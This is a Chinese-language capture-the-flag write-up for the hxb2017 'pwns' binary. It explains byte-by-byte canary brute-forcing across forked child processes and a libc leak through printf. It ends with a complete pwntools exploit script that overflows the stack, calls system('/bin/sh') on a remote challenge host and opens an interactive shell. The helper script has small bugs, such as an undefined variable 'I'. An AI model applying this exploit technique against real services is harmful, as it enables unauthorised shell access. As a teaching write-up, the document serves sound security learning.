CTFctf

hxb2017 pwns canary bruteforce

2019-10-31  本文已影响0人  v1gor

利用fork的子程序保持canary不变的特性来逐字节爆破canary

流程概述

本题主要流程是:

漏洞分析

在拷贝到buf的过程中,由于拷贝长度远大于buf相对ebp的偏移,因此存在栈溢出

但是这题开了canary保护,每次失败后父进程将会fork出子进程来进行下一次询问,因为fork出的子进程使用相同的canary,考虑逐字节爆破canary.

为什么fork出的子进程canary会相同呢?看下检查canary的函数:

canary.png

ecx中存储的就是canary,看到是从gs段的某个偏移处取出的,最近在学操作系统所以对这个全局段寄存器比较脸熟,在windows下,gs存储TIB,PEB之类的进程数据,但是linux中不清楚是怎么样的,从canary不变的事实推测,所有的子进程和父进程是使用同一个gs寄存器的.

关于gs的资料,参考的是 https://bbs.pediy.com/thread-145559.htm

实现攻击

定位canary

用如下脚本可快速定位覆盖本体canary需要的输入长度:

from pwn import *
import base64
io =  process("./pwns")
for i in range(0x100,0x118):
    print io.recvuntil("[Y/N]")
    io.sendline("Y")
    io.sendline(base64.b64encode("a"*i))
    if "smash" in io.recvuntil("May"):
        print "smash detected:",I
        break
    else:
        print I

运行结果:

leakpoint.png

可知输入长度为258字节的时候发生了canary覆盖,因此可以先输入257个"a",再输入一个字符覆盖canary最高字节,如果覆盖正确则程序会正常返回,输出"Finish";如果错误则本地程序会报错“smash”,远程则表现为不输出Finish.

按上述分析可逐字节爆破canary,之后可以进行栈溢出.

泄露libc实际地址

在栈上发现了一个__libc_start_main附近的地址,由于canary检测之前就调用了printf来打印解码后的字符串,因此可以轻松泄露栈上任意高于buf地址的栈中的值.

爆破canary

这一题由于printf的存在,我们不需要爆破4字节的canary,因为最高字节如果不是"\x00",那么将printf("%s\n")将会泄露接下来的三个字节的canary,因此只需要爆破一个字节即可.

那为啥不直接一次泄露4字节呢,这个我一开始就试过,直接输入257个"a"的话一般不会泄露出整个canary,一开始我也很不解,但是调试过程中发现canary的最高字节一般都是"\x00"(这是什么原理emmmmm)所以这个脚本写起来就很简单了.

遇到的问题

脚本

#encoding=utf8
from pwn import *
import base64
#io = process("./pwns",env={'LD_PRELOAD':'./libc.so.6'})
#io = process("./pwns")
io = remote("118.190.77.161",10080)
libc = ELF("./libc.so.6")
c = 0
#泄露libc实际地址
print "1:",repr(io.recvuntil("data[Y/N]\n"))
io.sendline("Y")
print "2:",repr(io.recvuntil("datas:\n\n"))
payload = base64.b64encode("a"*257+"b"*4+19 * 4 * "a")
io.sendline(payload)
data = io.recvuntil("\n")
print repr(data)
libc_main_F6 = int(data[::-1][2:6].encode("hex"),16)
libc_main = libc_main_F6 - 0xf6

#计算system,binsh实际地址
main_offset = libc.symbols["__libc_start_main"]
print "[+]main_offset:",hex(main_offset)
ret_addr = 0x6569f - main_offset + libc_main
system_offset = libc.symbols["system"]
print "[+]system_offset:",hex(system_offset)

system_addr = libc_main + system_offset - main_offset
bin_sh_offset =0x15CDC8 #0x00162CEC#
bin_sh_addr = bin_sh_offset - system_offset + system_addr

print "[+]leak addr:",hex(libc_main)
print "[+]system addr:",hex(system_addr)
print "[+]binsh addr",hex(bin_sh_addr)

#爆破canary
canary = ""
io.recv()
io.sendline("Y")
io.recvuntil("datas:")
io.recv(timeout = 1)
payload = base64.b64encode("A"*257+"a")
io.send(payload)
content = io.recvuntil("data[Y/N]")
io.recv(timeout = 1)
print "content is:",repr(content)
canary = content[257+11:257+14]


for c1 in range(0,0xff):
    io.sendline("Y")
    io.recvuntil("datas:")
    io.recv(timeout = 1)
    payload = base64.b64encode("A"*257+chr(c1))
    print "payload:",payload
    io.send(payload)
    content = io.recvuntil("data[Y/N]")
    io.recv(timeout = 1)
    print "content is:",repr(content)
    canary = chr(c1) +  canary 
    if "Finish" in content:
        print "[!]canary is:",canary.encode("hex")
        break
    else:
        print "[-]"+canary.encode("hex")+" not right"

payload =base64.b64encode("a" * 257 + canary + "b"*4*3 + p32(system_addr)+ "x"*4+ p32(bin_sh_addr))
io.sendline("Y")
io.sendline(payload)
io.interactive()
上一篇下一篇

猜你喜欢

热点阅读